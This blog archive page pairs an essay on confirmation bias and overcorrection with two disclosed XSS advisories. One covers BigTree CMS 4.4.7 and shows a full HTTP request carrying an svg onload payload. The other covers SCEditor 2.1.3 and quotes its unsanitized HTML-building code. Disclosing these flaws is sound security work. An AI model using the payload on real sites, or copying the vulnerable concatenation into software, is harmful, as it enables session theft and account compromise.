Edric, Author at Edric Teo • Page 7 of 17

Swing Bias

Swing Bias occurs when a person starts with an original thesis, swings to the opposing view to avoid confirmation bias, realizes they may have overcorrected, and swings back to the original thesis.

***

Confirmation bias is the tendency to believe in things that align with our existing beliefs. It influences our daily search, interpretation, and recollection of information. Schools teach this bias to help students develop critical thinking skills.

However, there are second-order effect to this bias.

Since we are aware that confirmation bias exist, we have to consider opposing viewpoints to ensure our evaluation is well-rounded.

We can begin by identifying obvious points that are on the extreme opposite end. These points fall into the category of known-unknowns, where we simply invert our current viewpoint.

However, points along the spectrum live in the realm of unknown-unknowns.

As a result, we rely on readily available information for our research. For example, both our online searches and the people we speak to are biased.

Consider this: our primary source of information is through search engines, which ranks information based on what the engineers deem useful for consumers. How can a search engine truly understand a user’s intent and determine what is useful?

The role of a search engine is to determine what is most useful to the majority.

This bias also extends to the people we engage with for discussions as well. Even when considering the viewpoints of experts in a particular field, not all are accessible for a discussion. As such, our discussion points are biased towards the experts who are more available.

Adding to the complexity, most viewpoints fall along a spectrum rather than being at opposite ends. This means that, in addition to identifying these points (if we can even identify them), the influence they they have on a thesis needs to be weighted. And of course, the assigned weightage of these viewpoints in itself is bias.

Balancing all of these factors is more of an art than a science.

While gathering information on opposing viewpoints, we may inadvertently overcorrect our original thesis, resulting in a counter confirmation bias.

Now that we are aware of this possibility, there is nothing preventing us from overcorrecting again.

BigTree CMS – XSS Vulnerability in Version 4.4.7

Product Information:

Software: BigTree CMS

Tested Version: 4.4.7, released 16.10.2019

Vulnerability Type: Cross-Site Scripting (CWE-79)

Description: BigTree is an extremely extensible open-source CMS built on PHP and MySQL. (excerpt copied from https://www.bigtreecms.org/)

The following is a POST request to create a tag with the payload:

POST /admin/tags/create/ HTTP/1.1
Host: demo.bigtreecms.org
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:72.0) Gecko/20100101 Firefox/72.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 54
Origin: https://demo.bigtreecms.org
Connection: close
Referer: https://demo.bigtreecms.org/admin/tags/add/
Cookie: PHPSESSID=giqced7qd6sqkrb6i2tdndbvl1; bigtree_admin[page_properties_open]=on;
bigtree_admin[email][email protected];
bigtree_admin[login]=["session-5e419446c4d265.05914498","chain-5e419446c4c097.13460452"]
Upgrade-Insecure-Requests: 1

tag="><svg/onload=alert(/xss/)/>

Impact:

A user with tag-adding capability is able to steal the cookie of another user with higher privilege.

Solution:

Update to Bigtree CMS version 4.4.9.

Timeline:

Vulnerability found: 11.02.2020

The vendor informed: 11.02.2020

Vendor responded: 13.02.2020

Bug fixed: 28.02.2020

Version 4.4.9 released: 06.03.2020

Public Advisory: 06.04.2020

References:

https://github.com/bigtreecms/BigTree-CMS/commit/7a588580958c74dbb820991d37d7b3c8f0843668

https://github.com/bigtreecms/BigTree-CMS/commit/c34c2a7623d153549e63188eadf7ff40200b8b11

[CVE-2019-19466] SCEditor – XSS Vulnerability in Version 2.1.3

Product Information:

Software: SCEditor

Tested Version: 2.1.3, released 04.05.2018

Vulnerability Type: Cross-Site Scripting (CWE-79)

Description: A lightweight, open source, WYSIWYG BBCode and (X)HTML editor. (copied from https://www.sceditor.com/)

Vulnerability description:

There are 3 XSS vulnerabilities in SCEditor version 2.1.3.

The following are the three default features which are vulnerable to XSS:

Insert image
Insert email
Insert link

The relevant code could be found in /src/lib/defaultCommands.js.

editor.wysiwygEditorInsertHtml(
	'<img' + attrs + ' src="' + url + '" />' // line 505
);

editor.wysiwygEditorInsertHtml(
  '<a href="' + 'mailto:' + email + '">' + // line 550
  	 (text || email) +
  '</a>'
  );

editor.wysiwygEditorInsertHtml(
	'<a href="' + url + '">' + text + '</a>' // line 610
 );

Impact:

The 3 identified dom-based XSS have limited impact and are dependent on how these variables are used. Projects implementing SCEditor should take extra care to ensure proper sanitization.

Solution:

Sanitize the variables mentioned in the vulnerability description section.

Timeline:

Vulnerability found: 1.09.2019

The vendor informed: 01.09.2019 & 26.11.2019

Public Advisory: 05.12.2019 (Passed 90-days since initial contact)

References:

https://github.com/samclarke/SCEditor/commit/7fd14aecc6f0c68f1e8bb98b12f6f0da769c671a – reference for the latest version